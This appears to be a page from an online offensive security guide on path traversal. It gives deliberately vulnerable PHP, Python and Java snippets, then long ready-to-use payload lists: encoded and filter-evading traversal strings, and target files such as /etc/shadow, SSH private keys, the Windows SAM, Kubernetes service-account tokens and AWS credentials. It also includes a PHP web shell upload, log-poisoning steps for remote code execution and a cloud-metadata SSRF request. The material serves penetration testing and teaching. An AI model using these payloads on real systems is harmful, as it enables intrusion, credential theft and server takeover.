This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Path traversal

Understanding Path Traversal

What is Path Traversal?

Path traversal (also known as directory traversal) is a security vulnerability that allows attackers to access files and directories outside of the intended directory structure. This occurs when applications use user-supplied input to construct file paths without proper validation or sanitization.

Vulnerable Code Example

// PHP vulnerable file reading
$file = $_GET['file'];
$content = file_get_contents('/var/www/html/uploads/' . $file);
echo $content;

Normal Request:

  • URL: GET /view.php?file=document.pdf

  • Path: /var/www/html/uploads/document.pdf

Malicious Request:

  • URL: GET /view.php?file=../../../etc/passwd

  • Path: /var/www/html/uploads/../../../etc/passwd/etc/passwd

How Path Traversal Works

Path traversal exploits the way operating systems handle relative path references. By using special directory references like ../ (parent directory) or absolute paths, attackers can navigate outside the intended directory structure to access sensitive files.

Common Path Traversal Sequences

Unix/Linux Systems:

  • ../ - Parent directory

  • ./ - Current directory

  • / - Root directory

  • ~ - Home directory

  • // - Alternative root (some systems)

Windows Systems:

  • ..\ - Parent directory

  • .\ - Current directory

  • C:\ - Drive root

  • \\ - UNC path prefix

  • / - Also works on Windows

Impact and Consequences

  • Sensitive File Access - Reading configuration files, passwords, keys

  • Source Code Disclosure - Accessing application source code

  • System Information Gathering - Reading system files, logs

  • Credential Harvesting - Accessing password files, tokens

  • Remote Code Execution - In combination with file upload vulnerabilities

  • Denial of Service - Accessing large files or system resources

Common Vulnerable Scenarios

File Download/View Functionality

Document Viewers:

// Vulnerable document viewer
$doc = $_GET['document'];
readfile('/var/www/docs/' . $doc);

Image Galleries:

// Vulnerable image display
$image = $_GET['img'];
header('Content-Type: image/jpeg');
readfile('/var/www/images/' . $image);

Log File Viewers:

// Vulnerable log viewer
$logfile = $_POST['log'];
echo file_get_contents('/var/log/app/' . $logfile);

File Upload Paths

Upload Directory Specification:

# Vulnerable upload path
import os
upload_dir = request.form['directory']
filename = request.files['file'].filename
filepath = os.path.join('/uploads/', upload_dir, filename)

Template File Access:

// Vulnerable template loading
String template = request.getParameter("template");
File templateFile = new File("/app/templates/" + template);

Include/Require Operations

Dynamic File Inclusion:

// Vulnerable include
$page = $_GET['page'];
include('/var/www/pages/' . $page . '.php');

Configuration File Loading:

# Vulnerable config loading
config_file = request.args.get('config')
with open(f'/app/config/{config_file}', 'r') as f:
    config = f.read()

Basic Path Traversal Techniques

Simple Directory Traversal

Basic Dot-Dot-Slash

Linux/Unix Traversal:

# Move up one directory
../etc/passwd

# Move up multiple directories  
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd

# Access system files
../../../etc/shadow
../../../root/.bash_history
../../../var/log/auth.log

Windows Traversal:

# Windows directory traversal
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\users\administrator\desktop\passwords.txt

Absolute Path Access

Direct Absolute Paths:

# Linux absolute paths
/etc/passwd
/etc/shadow
/root/.ssh/id_rsa
/var/log/apache2/access.log

# Windows absolute paths
C:\windows\system32\drivers\etc\hosts
C:\users\administrator\documents\passwords.txt
C:\inetpub\wwwroot\web.config

Mixed Traversal Techniques

Combining Relative and Absolute:

# Start with relative, end with absolute
../../../etc/passwd
../../../../../../etc/passwd

# Mixed separators (Windows)
../../../windows\system32\drivers\etc\hosts
..\..\..\windows/system32/drivers/etc/hosts

URL Encoding Bypass

Single URL Encoding

Basic URL Encoding:

# Encoded dot-dot-slash
%2e%2e%2f → ../
%2e%2e%5c → ..\

# Full path encoding
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

# Windows path encoding
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
→ ..\..\..\windows\system32\drivers\etc\hosts

Double URL Encoding

Double-Encoded Sequences:

# Double encoded dot-dot-slash
%252e%252e%252f → %2e%2e%2f → ../
%252e%252e%255c → %2e%2e%5c → ..\

# Double encoded paths
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
→ %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

Unicode and UTF-8 Encoding

Unicode Variations:

# Unicode dot representations
\u002e\u002e\u002f → ../
\u002e\u002e\u005c → ..\

# UTF-8 encoded sequences
%c0%ae%c0%ae%c0%af → ../
%c1%9c%c1%9c%c1%af → ../

# Overlong UTF-8 encoding
%e0%80%ae%e0%80%ae%e0%80%af → ../

Filter Evasion Techniques

Null Byte Injection

Null Byte Termination:

# Null byte to bypass extension checks
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
../../../etc/passwd\0.jpg

# Multiple null bytes
../../../etc/passwd%00%00.txt

Case Variation

Mixed Case Paths:

# Case variations
../../../ETC/passwd
../../../Etc/Passwd
../../../etc/PASSWD

# Windows case insensitive
..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\Windows\System32\Drivers\Etc\Hosts

Alternative Separators

Different Path Separators:

# Forward slash on Windows
../../../windows/system32/drivers/etc/hosts

# Backslash on Unix (if processed)
..\..\..\etc\passwd

# Mixed separators
../../../windows\system32/drivers\etc/hosts
..\..\..\windows/system32\drivers/etc\hosts

Character Substitution

Alternative Character Representations:

# Backslash variations
.%5c.%5c.%5cetc%5cpasswd
.%2f.%2f.%2fetc%2fpasswd

# Alternative dot representations
%2e%2e/etc/passwd
%2E%2E/etc/passwd

# Space and tab characters
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd

Advanced Path Traversal Techniques

Deep Directory Traversal

Excessive Dot-Dot Sequences

Over-Traversal:

# More traversals than needed
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd

# Windows over-traversal
..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts

Nested Path Construction

Complex Path Building:

# Nested relative paths
dir1/../dir2/../../../etc/passwd
folder/../subfolder/../../etc/passwd
app/data/../../../etc/passwd

# Mixed absolute and relative
/var/www/../../../etc/passwd
C:\inetpub\..\..\..\windows\system32\drivers\etc\hosts

Application-Specific Bypasses

Framework-Specific Techniques

PHP Path Traversal:

# PHP stream wrappers
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# PHP input streams
php://input
php://stdin

Java Path Traversal:

# Java classpath access
../../../WEB-INF/classes/application.properties
../../../WEB-INF/web.xml
../../../META-INF/MANIFEST.MF

# JAR file access
jar:file:../../../app.jar!/config.properties

ASP.NET Path Traversal:

# ASP.NET configuration
../../../web.config
../../../global.asax
../../../bin/application.dll.config

# IIS specific
../../../inetpub/wwwroot/web.config

Operating System Specific

Linux-Specific Paths:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/version
../../../proc/meminfo

# System configuration
../../../etc/hostname
../../../etc/issue
../../../etc/resolv.conf
../../../etc/hosts

Windows-Specific Paths:

# Windows registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

# Windows system information
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\windows\system.ini

Filter Bypass Combinations

Multi-Encoding Techniques

Layered Encoding:

# URL + Unicode
%u002e%u002e%u002f → ../
%u002e%u002e%u005c → ..\

# Double URL + Case
%252E%252E%252F → %2E%2E%2F → ../
%252e%252e%252f → %2e%2e%2f → ../

# Triple encoding
%25252e%25252e%25252f → %252e%252e%252f → %2e%2e%2f → ../

Whitespace and Special Characters

Whitespace Injection:

# Spaces in paths
../ ../../../etc/passwd
..%20/..%20/..%20/etc/passwd

# Tab characters
..%09/..%09/..%09/etc/passwd

# Newlines and carriage returns
..%0a/..%0a/..%0a/etc/passwd
..%0d/..%0d/..%0d/etc/passwd

Path Normalization Bypass

Path Segment Manipulation:

# Redundant path segments
./../../etc/passwd
.././../etc/passwd
..//../../etc/passwd

# Self-referencing paths
./../.././../etc/passwd
././../../etc/passwd

Platform-Specific Exploitation

Linux/Unix Systems

System File Access

Password and Authentication:

# User account information
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/sudoers

# SSH keys and configuration
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../etc/ssh/sshd_config
../../../home/user/.ssh/id_rsa

System Configuration:

# Network configuration
../../../etc/hosts
../../../etc/resolv.conf
../../../etc/network/interfaces
../../../etc/hostname

# System information
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../etc/issue
../../../etc/os-release

Log Files:

# System logs
../../../var/log/syslog
../../../var/log/auth.log
../../../var/log/daemon.log
../../../var/log/kern.log

# Application logs
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/mysql/error.log

Application Files

Web Server Configuration:

# Apache configuration
../../../etc/apache2/apache2.conf
../../../etc/apache2/sites-enabled/000-default
../../../etc/httpd/conf/httpd.conf

# Nginx configuration
../../../etc/nginx/nginx.conf
../../../etc/nginx/sites-enabled/default

Database Configuration:

# MySQL configuration
../../../etc/mysql/my.cnf
../../../var/lib/mysql/mysql/user.MYD

# PostgreSQL configuration
../../../etc/postgresql/postgresql.conf
../../../var/lib/postgresql/data/pg_hba.conf

Windows Systems

System File Access

System Configuration:

# Windows system files
..\..\..\windows\win.ini
..\..\..\windows\system.ini
..\..\..\windows\system32\drivers\etc\hosts

# Registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

User Data:

# User profiles
..\..\..\users\administrator\desktop\passwords.txt
..\..\..\users\administrator\documents\database.mdb
..\..\..\users\administrator\appdata\roaming\application\config.ini

# Application data
..\..\..\programdata\application\config.xml
..\..\..\program files\application\config\database.conf

IIS and ASP.NET Files

IIS Configuration:

# IIS configuration
..\..\..\inetpub\wwwroot\web.config
..\..\..\windows\system32\inetsrv\config\applicationhost.config

# ASP.NET files
..\..\..\inetpub\wwwroot\bin\application.dll.config
..\..\..\inetpub\wwwroot\global.asax
..\..\..\inetpub\wwwroot\app_data\database.mdf

Windows Services:

# Service configuration
..\..\..\windows\system32\config\software
..\..\..\program files\service\config.xml
..\..\..\programdata\service\settings.ini

Web Application Context Exploitation

File Download Vulnerabilities

Document Management Systems

Download Endpoint Exploitation:

# Document download
GET /download?file=../../../etc/passwd
GET /document/view?path=../../../etc/shadow
POST /file/get
Content-Type: application/x-www-form-urlencoded
filename=../../../var/log/auth.log

PDF/Document Viewers:

# PDF viewer exploitation
GET /pdf/view?document=../../../etc/passwd
GET /doc/display?file=../../../root/.ssh/id_rsa
GET /report/generate?template=../../../etc/mysql/my.cnf

Image and Media Galleries

Image Gallery Exploitation:

# Image viewer
GET /gallery/image?file=../../../etc/passwd
GET /media/view?img=../../../var/log/apache2/access.log

# Thumbnail generation
GET /thumb/generate?image=../../../etc/shadow
POST /image/resize
Content-Type: application/json
{"image": "../../../root/.bash_history"}

File Upload Vulnerabilities

Upload Path Manipulation

Directory Traversal in Upload:

# Upload to arbitrary location
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../var/www/html/shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

ZIP File Extraction (Zip Slip):

# Malicious ZIP with path traversal
# Create ZIP with entry: ../../../var/www/html/backdoor.php
# When extracted, places file outside intended directory

Template and Include Vulnerabilities

Template Engine Exploitation

Template Path Traversal:

# Template inclusion
GET /render?template=../../../etc/passwd
POST /template/process
Content-Type: application/json
{
  "template": "../../../var/log/auth.log",
  "data": {"user": "admin"}
}

Server-Side Include (SSI):

# SSI file inclusion
GET /page.shtml?include=../../../etc/passwd
GET /template.html?file=../../../proc/version

Advanced Exploitation Scenarios

Chained Attacks

Path Traversal to RCE

File Upload + Path Traversal:

# Step 1: Upload malicious file
POST /upload
filename=shell.php
content=<?php system($_GET['c']); ?>

# Step 2: Access via path traversal
GET /view?file=../uploads/shell.php&c=whoami

Log Poisoning + Path Traversal:

# Step 1: Poison log file via User-Agent
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

# Step 2: Include log file
GET /view?file=../../../var/log/apache2/access.log&cmd=id

Information Gathering Chain

Configuration Discovery:

# Step 1: Find application type
GET /view?file=../../../etc/issue

# Step 2: Target specific configs
GET /view?file=../../../etc/apache2/sites-enabled/000-default

# Step 3: Extract database credentials
GET /view?file=../../../var/www/html/config.php

# Step 4: Access database files
GET /view?file=../../../var/lib/mysql/mysql/user.MYD

Container and Cloud Exploitation

Docker Container Escape

Container File Access:

# Container metadata
../../../proc/self/cgroup
../../../proc/self/mountinfo

# Docker socket access
../../../var/run/docker.sock

# Host filesystem access (if mounted)
../../../host/etc/passwd
../../../host/root/.ssh/id_rsa

Kubernetes Pod Escape

Service Account Access:

# Service account token
../../../var/run/secrets/kubernetes.io/serviceaccount/token

# Kubernetes API access
../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Pod metadata
../../../proc/self/environ

Cloud Metadata Access

AWS Instance Metadata:

# Via SSRF through path traversal
GET /proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Local file with cloud credentials
../../../home/ec2-user/.aws/credentials
../../../root/.aws/config

Language and Framework Specific

PHP Applications

PHP-Specific Vulnerabilities

PHP Stream Wrappers:

# PHP filter wrapper
php://filter/convert.base64-encode/resource=../../../etc/passwd

# PHP input wrapper
php://input

# Data wrapper
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# Expect wrapper (if enabled)
expect://whoami

Include/Require Exploitation:

// Vulnerable PHP include
<?php
$page = $_GET['page'];
include($page . '.php');
?>

// Exploitation
GET /index.php?page=../../../etc/passwd%00
GET /index.php?page=php://filter/convert.base64-encode/resource=config

PHP Configuration Files

Common PHP Targets:

# PHP configuration
../../../etc/php/7.4/apache2/php.ini
../../../usr/local/etc/php/php.ini

# Application configs
../../../var/www/html/wp-config.php
../../../var/www/html/config.php
../../../var/www/html/.env

Java Applications

Java-Specific Paths

Java Application Files:

# Spring Boot configuration
../../../application.properties
../../../application.yml
../../../config/application.properties

# Web application files
../../../WEB-INF/web.xml
../../../WEB-INF/classes/application.properties
../../../META-INF/MANIFEST.MF

Class Path Traversal:

# Java class files
../../../WEB-INF/classes/com/company/app/Config.class
../../../WEB-INF/lib/application.jar

# Log4j configuration
../../../WEB-INF/classes/log4j.properties
../../../WEB-INF/classes/log4j2.xml

Python Applications

Python-Specific Files

Python Application Files:

# Python configuration
../../../settings.py
../../../config.py
../../../requirements.txt

# Django specific
../../../manage.py
../../../settings/local.py
../../../static/admin/

# Flask specific
../../../app.py
../../../config/development.py

Python Virtual Environments

Virtual Environment Access:

# Virtual environment files
../../../venv/pyvenv.cfg
../../../env/lib/python3.8/site-packages/

# Python cache files
../../../__pycache__/settings.cpython-38.pyc

Node.js Applications

Node.js Specific Files

Node.js Configuration:

# Package and configuration files
../../../package.json
../../../package-lock.json
../../../.env
../../../config/default.json

# Node modules
../../../node_modules/express/package.json
../../../node_modules/.bin/

Process and Environment:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline

# Node.js specific
../../../.npmrc
../../../yarn.lock
PreviousXML injection (XXE - XML External Entity)NextFile upload vulnerabilities

Last updated

Was this helpful?